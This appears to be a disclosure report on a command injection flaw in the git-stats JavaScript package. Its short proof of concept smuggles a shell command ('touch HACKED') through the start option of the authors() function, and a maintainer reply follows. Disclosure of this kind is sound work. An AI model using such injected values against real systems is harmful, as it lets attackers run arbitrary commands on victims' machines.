Code Injection in ionicabizau/git-stats
Valid
Reported on Aug 23rd 2020
Overview
git-stats is a JavaScript package for local git statistics, including GitHub-like contribution calendars.
Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbitrary commands by using a semicolon character in either the options.start or options.end value passed to the authors() function.
Proof of Concept
var GitStats = require("git-stats");
var g1 = new GitStats();
// The start value closes the quoted date argument, appends ";touch HACKED;"
// and comments out the remainder of the shell command line.
g1.authors({
  start: ' " ;touch HACKED; #//',
  end: 'endstring'
}, (resp, pieData) => {
  console.log("Done!");
});
Thank you for this and sorry for the late reply.